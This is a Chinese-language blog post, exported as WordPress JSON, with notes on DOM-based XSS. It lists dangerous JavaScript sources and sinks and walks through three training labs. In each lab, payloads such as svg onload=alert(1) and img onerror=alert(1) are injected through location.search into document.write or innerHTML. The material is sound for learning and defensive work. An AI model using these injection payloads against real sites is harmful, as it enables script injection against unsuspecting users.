{"id":1221,"date":"2023-02-18T11:22:00","date_gmt":"2023-02-18T03:22:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1221"},"modified":"2024-02-21T19:55:10","modified_gmt":"2024-02-21T11:55:10","slug":"dom-xss","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1221","title":{"rendered":"DOM XSS"},"content":{"rendered":"\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

jS\u5982\u679c\u4f7f\u7528\u4ee5\u4e0bsource\u8207sinks\u642d\u914d\uff0c\u5bb9\u6613\u7522\u751fdom XSS\u6f0f\u6d1e<\/p>\n\n\n\n

source\u662f\u4e00\u500b JavaScript \u5c6c\u6027\uff0c\u5b83\u63a5\u53d7\u53ef\u80fd\u7531\u653b\u64ca\u8005\u63a7\u5236\u7684\u8cc7\u6599\uff0c\u5e38\u898b\u7684\u9ad8\u98a8\u96aasource\u5982\u4e0b<\/p>\n\n\n\n

document.URL\ndocument.documentURI\ndocument.URLUnencoded\ndocument.baseURI\nlocation\nlocation.search\ndocument.cookie\ndocument.referrer\nwindow.name\nhistory.pushState\nhistory.replaceState\nlocalStorage\nsessionStorage\nIndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)\nDatabase<\/code><\/pre>\n\n\n\n
sinks\u662f\u4e00\u7a2e\u6f5b\u5728\u5371\u96aa\u7684 JavaScript \u51fd\u6578\u6216 DOM \u5c0d\u8c61\uff0c\u5982\u679c\u5c07\u653b\u64ca\u8005\u63a7\u5236\u7684\u8cc7\u6599\u50b3\u905e\u7d66\u5b83\uff0c\u53ef\u80fd\u6703\u5c0e\u81f4\u4e0d\u826f\u5f71\u97ff\uff0c\u5e38\u898b\u7684\u9ad8\u98a8\u96aasinks\u5982\u4e0b<\/p>\n\n\n\n
document.write()\ndocument.writeln()\ndocument.domain\ndocument.body.innerHTML\nsomeDOMElement.innerHTML\nsomeDOMElement.outerHTML\nsomeDOMElement.insertAdjacentHTML\nsomeDOMElement.onevent\neval()<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
document.write+location.search example1<\/h2>\n\n\n\n
document.write<\/code>\u51fd\u6578\u4f7f\u7528\u4f86\u81ealocation.search<\/code>\u7684\u8cc7\u6599\uff0c\u56e0\u6b64\u53ef\u4ee5\u4f7f\u7528\u7db2\u7ad9URL\u9032\u884c\u63a7\u5236\u3002<\/p>\n\n\n\n
\u8acb\u6c42?search=test<\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u5982\u4e0b\uff0cjs\u7684document.write\u5c07location.search\u7684\u6578\u64da\u5beb\u5165\u9801\u9762<\/p>\n\n\n\n
<script>\nfunction trackSearch(query) {\n     document.write('<img src=\"\/resources\/images\/tracker.gif?searchTerms='+query+'\">');\n}\nvar query = (new URLSearchParams(window.location.search)).get('search');\nif(query) {\n     trackSearch(query);\n}\n<\/script>\n<section class=\"blog-list no-results\">\n     <div class=\"is-linkback\">\n        <a href=\"\/\">Back to Blog<\/a>\n     <\/div>\n<\/section><\/code><\/pre>\n\n\n\n
\u4f7f\u7528chrome inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u525b\u525b\u7684\u8f38\u5165\u5167\u5bb9\u51fa\u73fe\u5728img src<\/code>\u5167<\/p>\n\n\n\n
<script>\nfunction trackSearch(query) {\n     document.write('<img src=\"\/resources\/images\/tracker.gif?searchTerms='+query+'\">');\n}\nvar query = (new URLSearchParams(window.location.search)).get('search');\nif(query) {\n     trackSearch(query);\n}\n<\/script>\n<img src=\"\/resources\/images\/tracker.gif?searchTerms=test\"><\/mark>\n<section class=\"blog-list no-results\">\n     <div class=\"is-linkback\">\n        <a href=\"\/\">Back to Blog<\/a>\n     <\/div>\n<\/section><\/code><\/pre>\n\n\n\n
\u8acb\u6c42?search=\"><svg onload=alert(1)><\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u90fd\u76f8\u540c\uff0c\u5982\u4e0b<\/p>\n\n\n\n
<script>\nfunction trackSearch(query) {\n     document.write('<img src=\"\/resources\/images\/tracker.gif?searchTerms='+query+'\">');\n}\nvar query = (new URLSearchParams(window.location.search)).get('search');\nif(query) {\n     trackSearch(query);\n}\n<\/script>\n<section class=\"blog-list no-results\">\n     <div class=\"is-linkback\">\n        <a href=\"\/\">Back to Blog<\/a>\n     <\/div>\n<\/section><\/code><\/pre>\n\n\n\n
\u4f7f\u7528chrome inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u6210\u529f\u900f\u904edom\u57f7\u884cXSS\u653b\u64ca<\/p>\n\n\n\n
<script>\nfunction trackSearch(query) {\n     document.write('<img src=\"\/resources\/images\/tracker.gif?searchTerms='+query+'\">');\n}\nvar query = (new URLSearchParams(window.location.search)).get('search');\nif(query) {\n     trackSearch(query);\n}\n<\/script>\n<img src=\"\/resources\/images\/tracker.gif?searchTerms=\">\n<svg onload=\"alert(1)\">\"><\/mark>\n     <section class=\"blog-list no-results\"><\/section>\n<\/svg><\/code><\/pre>\n\n\n\n
ps: \u8a72\u76ee\u6a19\u53ef\u7528dom invader\uff0c\u4f46\u8981\u5728\u641c\u5c0b\u7d50\u679c\u9801\u9762\u4e0a\u4f7f\u7528\u624d\u80fd\u767c\u73fe<\/p>\n\n\n\n
Lab: DOM XSS in document.write sink using source location.search<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
document.write+location.search example2<\/h2>\n\n\n\n
\u5728\u7522\u54c1\u9801\u9762\u4e0a\uff0c\u5371\u96aa\u7684javascript\u539f\u78bc\u5982\u4e0b\uff0c\u5f9elocation.search<\/code>\u4f86\u6e90\u63d0\u53d6storeId<\/code>\u53c3\u6578 \u3002\u7136\u5f8c\u4f7f\u7528document.write<\/code>\u5728select<\/code>\u5c6c\u6027\u5167\u5efa\u65b0\u5143\u7d20  <\/p>\n\n\n\n
<script>\n    var stores = [\"London\",\"Paris\",\"Milan\"];\n    var store = (new URLSearchParams(window.location.search)).get('storeId');\n        document.write('<select name=\"storeId\">');\n        if(store) {\n            document.write('<option selected>'+store+'<\/option>');\n        }\n        for(var i=0;i<stores.length;i++) {\n              if(stores[i] === store) {\n                    continue;\n              }\n        document.write('<option>'+stores[i]+'<\/option>');\n     }\n     document.write('<\/select>');\n<\/script><\/code><\/pre>\n\n\n\n
\u5047\u5982\u6b63\u5e38\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n
############### request ###############\nGET \/product?productId=1\n...omit...\n\n############### response ###############\n...omit...\n<script>...<\/script>\n<button type=\"submit\" class=\"button\">Check stock<\/button>\n<\/form>\n...omit...<\/code><\/pre>\n\n\n\n
chrome inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u591a\u51fa<select><\/code>\u5143\u7d20<\/p>\n\n\n\n
<script>...<\/script>\n<select name=\"storeId\">\n  <option>London<\/option>\n  <option>Paris<\/option>\n  <option>Milan<\/option>\n<\/select><\/mark>\n<button type=\"submit\" class=\"button\">Check stock<\/button>\n<\/code><\/pre>\n\n\n\n
\u589e\u52a0&storeId=test<\/code>\u5728\u8acb\u6c42\u4e2d\u505a\u6e2c\u8a66\uff0c\u53ef\u4ee5\u767c\u73fe\u8fd4\u56de\u7d50\u679c\u9084\u662f\u4e00\u6a23\u7684<\/p>\n\n\n\n
############### request ###############\nGET \/product?productId=1&storeId=test<\/mark>\n...omit...\n\n############### response ###############\n...omit...\n<script>...<\/script>\n<button type=\"submit\" class=\"button\">Check stock<\/button>\n<\/form>\n...omit...<\/code><\/pre>\n\n\n\n
chrome inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u5728option<\/code>\u9078\u9805\u591a\u4e86\u525b\u525b\u7684test<\/p>\n\n\n\n
<script>...<\/script>\n<select name=\"storeId\">\n  <option selected=\"\">test<\/option><\/mark>\n  <option>London<\/option>\n  <option>Paris<\/option>\n  <option>Milan<\/option>\n<\/select>\n<button type=\"submit\" class=\"button\">Check stock<\/button><\/code><\/pre>\n\n\n\n
\u5206\u6790\u8a72\u5c6c\u6027\u53ef\u4f7f\u7528\"><\/select><img%20src=1%20onerror=alert(1)><\/code>\u8a9e\u6cd5\u57f7\u884cxss<\/p>\n\n\n\n
############### request ###############\nGET \/product?productId=1&storeId=\"><\/select><img%20src=1%20onerror=alert(1)><\/mark>\n...omit...\n\n############### response ###############\n...omit...\n<script>...<\/script>\n<button type=\"submit\" class=\"button\">Check stock<\/button>\n<\/form>\n...omit...<\/code><\/pre>\n\n\n\n
chrome inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u5728option<\/code>\u9078\u9805\u591a\u4e86\u525b\u525b\u7684test<\/p>\n\n\n\n
<select name=\"storeId\"><option selected=\"\">\"><\/option><\/select>\n<img src=\"1\" onerror=\"alert(1)\"><\/mark>\n  <option>London<\/option>\n  <option>Paris<\/option>\n  <option>Milan<\/option>\n  <button type=\"submit\" class=\"button\">Check stock<\/button>\n<\/select><\/code><\/pre>\n\n\n\n
\u8a72\u76ee\u6a19\u7528dom invader\u627e\u4e0d\u5230\uff0c\u56e0\u70ba\u7db2\u9801\u76f4\u63a5\u56de\u8986invalid product id<\/p>\n\n\n\n
Lab: DOM XSS in document.write sink using source location.search inside a select element<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
innerHTML+location.search<\/h2>\n\n\n\n
innerHTML<\/code>\u4e0d\u63a5\u53d7\u4efb\u4f55\u73fe\u4ee3\u700f\u89bd\u5668\u4e0a\u7684script<\/code>\u5143\u7d20\uff0c\u4e5f\u4e0d\u6703\u88absvg onload<\/code>\u89f8\u767c\u4e8b\u4ef6\u3002\u56e0\u6b64\u9700\u8981\u4f7f\u7528\u66ff\u4ee3\u5143\u7d20\u50cf\u662fimg<\/code>\u6216iframe<\/code>\uff0c\u4e26\u642d\u914donload<\/code>\u548conerror<\/code>\u4f7f\u7528<\/p>\n\n\n\n
\u5728\u641c\u5c0b\u9801\u9762\u4e0a\uff0c\u5371\u96aa\u7684javascript\u539f\u78bc\u5982\u4e0b innerHTML<\/code><\/code>\u4f7f\u7528\u4f86\u81ealocation.search<\/code>\u7684\u8cc7\u6599\uff0c\u56e0\u6b64\u53ef\u4ee5\u4f7f\u7528\u7db2\u7ad9URL\u9032\u884c\u63a7\u5236\u3002<\/p>\n\n\n\n
<script>\nfunction doSearchQuery(query) {\n      document.getElementById('searchMessage').innerHTML = query;\n}\nvar query = (new URLSearchParams(window.location.search)).get('search');\nif(query) {\n      doSearchQuery(query);\n}\n<\/script><\/code><\/pre>\n\n\n\n
\u8acb\u6c42?search=test<\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u90fd\u4e00\u6a23\u5c31\u5148\u7701\u7565\uff0c\u76f4\u63a5\u770bchrome inspect\u7684\u8b8a\u5316\u5982\u4e0b\uff0c<\/p>\n\n\n\n
<span>0 search results for '<\/span>\n<span id=\"searchMessage\">test<\/mark><\/span><\/code><\/pre>\n\n\n\n
\u8acb\u6c42?search=<img src=\"1\" onerror=\"alert(1)\"><\/code>\uff0cchrome inspect\u7684\u8b8a\u5316\u5982\u4e0b\uff0c<\/p>\n\n\n\n
<span>0 search results for '<\/span>\n<span id=\"searchMessage\"><img src=\"1\" onerror=\"alert(1)\"><\/mark><\/span><\/code><\/pre>\n\n\n\n
\u4e0a\u8ff0\u7684\u65b9\u5f0f\u4e5f\u53ef\u7528,dom invader\u6aa2\u6e2c<\/p>\n\n\n\n
1 \u5728\u9801\u9762\/?search=\u7684\u60c5\u6cc1\uff0cdom invader\u9078\u64c7inject url params\uff0c\u6703\u5f48\u51fa\u65b0\u5206\u9801
2 \u5728\u65b0\u5206\u9801\u9078\u64c7inspect\u770bdom invader
3 dom invader\u9edesearch\u767c\u73fe\u53ef\u4ee5exploit <\/p>\n\n\n\n
<\/p>\n\n\n\n
Lab: DOM XSS in innerHTML sink using source location.search<\/p>\n","protected":false},"excerpt":{"rendered":"
jS\u5982\u679c\u4f7f\u7528\u4ee5\u4e0bsource\u8207sinks\u642d\u914d\uff0c\u5bb9\u6613\u7522\u751fdom …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-1221","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1221"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1221\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}